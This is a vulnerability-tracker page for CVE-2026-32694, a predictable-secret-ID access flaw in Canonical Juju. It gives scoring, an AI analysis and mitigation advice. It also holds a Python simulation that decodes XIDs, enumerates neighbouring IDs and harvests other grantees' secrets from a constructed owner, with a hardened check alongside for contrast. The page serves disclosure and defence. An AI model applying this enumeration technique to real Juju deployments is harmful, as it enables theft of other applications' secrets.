Description
In Juju from version 3.0.0 through 3.6.18, when a secret owner grants a grantee permissions on a secret, the secret owner relies exclusively on the secret's predictable XID to verify ownership. This allows a malicious grantee that can request secrets to predict past secrets granted by the same secret owner to different grantees, and so to use the resources granted by those past secrets. Successful exploitation relies on a very specific configuration and data semantics, and on the administrator needing to deploy at least two different applications, one of them controlled by the attacker.
Published: 2026-03-18
Score: 6.6 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Unauthorized Secret Access
Action: Immediate Patch
AI Analysis

Impact

A vulnerability in Juju versions 3.0.0 through 3.6.18 allows a grantee that has permission to request secrets to exploit the predictable secret identifier (XID) and infer the IDs of secrets that the same owner has granted to other grantees. Because the owner relies on the XID alone to verify ownership, a correctly guessed ID is enough to obtain a secret intended for another application. This is an instance of CWE-343 (Predictable Value Range from Previous Values) combined with CWE-639 (Authorization Bypass Through User-Controlled Key), i.e. an insecure direct object reference. The attacker can then use those secrets to reach resources and configuration that should be restricted to the intended grantee, potentially leading to unauthorized configuration changes or data exposure.
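The script below is an added illustration of the root cause, not Juju's code and not the advisory's proof of concept. It assumes the XID the description refers to has the rs/xid layout (4-byte Unix timestamp, 3-byte machine id, 2-byte process id, 3-byte counter, base32hex-encoded to 20 characters); the `SecretOwner` class, its clock, the `harvest` routine and the grantee names are constructed for the demonstration. It shows why a grantee that holds one ID can enumerate the IDs minted just before it, and the difference between deciding access from the ID alone and from a per-secret grant record.

```python
"""Added illustration of CVE-2026-32694's root cause: a secret ID that is
predictable is not a proof of ownership.

Not Juju code. Assumes the rs/xid layout for the XID (4-byte timestamp,
3-byte machine id, 2-byte pid, 3-byte counter; base32hex, 20 chars).
SecretOwner, its clock and the grantee names are constructed for the demo.
"""
from dataclasses import dataclass

ALPHABET = "0123456789abcdefghijklmnopqrstuv"  # lowercase base32hex, no padding


def xid_encode(raw: bytes) -> str:
    """12 raw bytes -> 20 chars (96 data bits followed by 4 zero bits)."""
    assert len(raw) == 12
    n = int.from_bytes(raw, "big") << 4
    return "".join(ALPHABET[(n >> (5 * i)) & 31] for i in range(19, -1, -1))


def xid_decode(text: str) -> bytes:
    """Inverse of xid_encode."""
    assert len(text) == 20
    n = 0
    for ch in text:
        n = (n << 5) | ALPHABET.index(ch)
    return (n >> 4).to_bytes(12, "big")


@dataclass
class XidParts:
    ts: int         # seconds since the Unix epoch
    machine: bytes  # 3 bytes, constant for a host
    pid: int        # process id, constant for a process
    counter: int    # 3 bytes, incremented once per generated id


def parse_xid(text: str) -> XidParts:
    raw = xid_decode(text)
    return XidParts(int.from_bytes(raw[0:4], "big"), raw[4:7],
                    int.from_bytes(raw[7:9], "big"), int.from_bytes(raw[9:12], "big"))


def make_xid(ts: int, machine: bytes, pid: int, counter: int) -> str:
    return xid_encode(ts.to_bytes(4, "big") + machine + pid.to_bytes(2, "big")
                      + (counter & 0xFFFFFF).to_bytes(3, "big"))


def candidate_ids(known: str, back: int, window_secs: int) -> list[str]:
    """IDs the process that minted `known` would have produced just before it:
    same machine and pid, a lower counter, a timestamp not later than known's."""
    p = parse_xid(known)
    return [make_xid(p.ts - dt, p.machine, p.pid, (p.counter - k) & 0xFFFFFF)
            for k in range(1, back + 1) for dt in range(window_secs + 1)]


class SecretOwner:
    """Simulated owner application (constructed): mints one secret per grantee."""

    def __init__(self, machine=b"\x01\x02\x03", pid=4242, start_ts=1_700_000_000):
        self.machine, self.pid, self.clock = machine, pid, start_ts
        self.counter = 0x100000          # rs/xid seeds this randomly per process
        self.secrets: dict[str, str] = {}
        self.grants: dict[str, str] = {}  # secret id -> grantee app

    def grant_new_secret(self, grantee: str, payload: str) -> str:
        self.clock += 7                  # a few seconds between grants (constructed)
        self.counter += 1
        sid = make_xid(self.clock, self.machine, self.pid, self.counter)
        self.secrets[sid], self.grants[sid] = payload, grantee
        return sid

    def vulnerable_get(self, requester: str, sid: str):
        """The flaw: 'is this one of my secret IDs?' is the whole check."""
        return self.secrets.get(sid)

    def hardened_get(self, requester: str, sid: str):
        """Look the grant up instead of trusting the requester-supplied key."""
        if self.grants.get(sid) != requester:
            return None
        return self.secrets[sid]


def harvest(attacker: str, known_sid: str, lookup, back=8, window_secs=120) -> dict:
    """Replay IDs neighbouring the grantee's own secret ID against `lookup`."""
    found = {}
    for cand in candidate_ids(known_sid, back, window_secs):
        value = lookup(attacker, cand)
        if value is not None:
            found[cand] = value
    return found


if __name__ == "__main__":
    owner = SecretOwner()
    owner.grant_new_secret("database", "db-password")
    owner.grant_new_secret("cache", "redis-token")
    mine = owner.grant_new_secret("untrusted-app", "attacker-own-secret")
    print("vulnerable:", harvest("untrusted-app", mine, owner.vulnerable_get))
    print("hardened:  ", harvest("untrusted-app", mine, owner.hardened_get))
```

Against `vulnerable_get` the untrusted grantee recovers both earlier secrets from under a thousand candidates; against `hardened_get` it recovers nothing, because the check is keyed on who the secret was granted to rather than on the ID the requester supplies. Real xids add entropy only in the machine id and the initial counter, both of which are constant for the owner's process and therefore visible in the one ID the attacker legitimately holds.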

Affected Systems

Canonical Juju versions 3.0.0 through 3.6.18 are affected. The CNA data lists no other vendors or products as impacted.

Risk and Exploitability

The CVSS 3.1 base score of 6.6 (vector AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H) reflects high confidentiality, integrity and availability impact tempered by high attack complexity and high privileges required, which is why it lands in the Medium band. The EPSS score below 1% estimates a low probability of in-the-wild exploitation over the coming 30 days; it is not a measure of how easy the attack is. The vulnerability is not listed in CISA's KEV catalog, although the SSVC assessment recorded on this page gives Exploitation: poc, i.e. a proof of concept exists, with Automatable: no. Exploitation requires that the attacker control an application that is a grantee with permission to request secrets, that the administrator has deployed at least two separate applications (one under the attacker's control) receiving secrets from the same owner, and that the attacker can predict the XIDs of the earlier grants. The attack vector is therefore constrained, but a successful attack yields secrets intended for another application.

Generated by OpenCVE AI on March 19, 2026 at 17:23 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade to a Juju release newer than 3.6.18 as soon as Canonical publishes one; the GitHub advisory GHSA-5cj2-rqqf-hx9p is the place to confirm the fixed version before relying on it.
  • Until then, do not deploy untrusted or third-party applications in the same model as an application that grants secrets to other applications, and revoke grants already given to applications you do not control; the attack needs the attacker's application to be a grantee of the same owner.
  • For charm and application authors: do not treat possession of a secret ID as proof that the requester is the intended grantee. Record which grantee each secret was granted to and check the requester against that record on every request, so that a guessed ID alone yields nothing.
  • Monitor Canonical's security advisories for an updated release and apply it promptly.



Advisories
Source: GitHub GHSA
ID: GHSA-5cj2-rqqf-hx9p
Title: Juju affected by Confused Deputy IDOR attack via Predictable user specified ID in Juju Secrets
History

Thu, 19 Mar 2026 15:15:00 +0000

Type   Values Removed   Values Added
CPEs   (none)           cpe:2.3:a:canonical:juju:*:*:*:*:*:*:*:*

Thu, 19 Mar 2026 09:45:00 +0000

Type                  Values Removed   Values Added
First Time appeared   (none)           Canonical; Canonical juju
Vendors & Products    (none)           Canonical; Canonical juju

Wed, 18 Mar 2026 14:15:00 +0000

Type      Values Removed   Values Added
Metrics   (none)           ssvc: {'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'total'}, 'version': '2.0.3'}


Wed, 18 Mar 2026 13:45:00 +0000

Type          Values Removed   Values Added
Description   (none)           In Juju from version 3.0.0 through 3.6.18, when a secret owner grants permissions to a secret to a grantee, the secret owner relies exclusively on a predictable XID of the secret to verify ownership. This allows a malicious grantee which can request secrets to predict past secrets granted by the same secret owner to different grantees, allowing them to use the resources granted by those past secrets. Successful exploitation relies on a very specific configuration, specific data semantic, and the administrator having the need to deploy at least two different applications, one of them controlled by the attacker.
Title         (none)           Insecure Direct Object Reference attack via predictable secret ID in Juju
Weaknesses    (none)           CWE-343; CWE-639
References    (none)           (none listed)
Metrics       (none)           cvssV3_1: {'score': 6.6, 'vector': 'CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H'}


MITRE

Status: PUBLISHED

Assigner: canonical

Published:

Updated: 2026-03-18T13:40:33.981Z

Reserved: 2026-03-13T12:53:34.544Z

Link: CVE-2026-32694

Vulnrichment

Updated: 2026-03-18T13:40:00.568Z

NVD

Status : Analyzed

Published: 2026-03-18T14:16:40.503

Modified: 2026-03-19T15:05:34.183

Link: CVE-2026-32694

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-03-24T10:58:47Z

Weaknesses